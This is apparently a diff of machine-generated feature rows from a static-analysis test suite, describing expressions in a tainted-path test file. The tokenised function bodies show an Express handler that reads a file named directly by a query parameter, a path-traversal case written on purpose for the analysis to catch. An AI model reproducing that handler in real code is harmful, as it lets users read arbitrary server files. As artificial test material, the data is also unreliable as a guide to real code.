autogenerated/TaintedPath/normalizedPaths.js:116:1:127:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:5:116:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:5:116:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:5:116:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | calleeImports | express | @@ -8072,6 +72356,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:116:9:116:19 | '/realpath' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | pathModule | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:116:21 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -8079,11 +72378,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | return of anonymous function | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:22:127:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:23:116:25 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:116:28:116:30 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:116:28:116:30 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:116:28:116:30 | res | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:116:28:116:30 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:116:28:116:30 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:10 | path | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path = ... y.path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:15 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:15 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:15 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:15 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:15 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:28 | fs.realpathSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:28 | fs.realpathSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:28 | fs.realpathSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:28 | fs.realpathSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:28 | fs.realpathSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | exceptional return of fs.real ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | exceptional return of fs.real ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | exceptional return of fs.real ... y.path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | exceptional return of fs.real ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | exceptional return of fs.real ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:17:117:28 | realpathSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:17:117:28 | realpathSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:17:117:28 | realpathSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:17:117:28 | realpathSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:17:117:28 | realpathSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:32 | req | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:38 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:38 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:38 | req.query | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:38 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:30:117:38 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | CalleeFlexibleAccessPath | fs.realpathSync | | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | calleeImports | fs | @@ -8093,6 +72462,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:117:30:117:43 | req.query.path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:117:34:117:38 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:34:117:38 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:34:117:38 | query | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:34:117:38 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:34:117:38 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:117:40:117:43 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:117:40:117:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:117:40:117:43 | path | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:117:40:117:43 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:117:40:117:43 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:4 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:17 | fs.readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | fs.read ... c(path) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:119:3:119:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:119:6:119:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:119:6:119:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:119:6:119:17 | readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:119:6:119:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:119:6:119:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | calleeImports | fs | @@ -8102,6 +72506,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:119:19:119:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:4 | fs | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:17 | fs.readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | exceptional return of fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | exceptional return of fs.read ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | exceptional return of fs.read ... html')) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | exceptional return of fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | exceptional return of fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | fs.read ... html')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | fs.read ... html')) | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:3:120:54 | fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:6:120:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:6:120:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:6:120:17 | readFileSync | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:6:120:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:6:120:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:28 | pathModule | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:33 | pathModule.join | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | exceptional return of pathMod ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | exceptional return of pathMod ... .html') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:120:19:120:53 | exceptional return of pathMod ... .html') | enclosingFunctionBody | req res path fs realpathSync req query path fs readFileSync path fs readFileSync pathModule join path index.html path startsWith /home/user/www fs readFileSync path fs readFileSync pathModule join . path fs readFileSync pathModule join /home/user/www path | +| 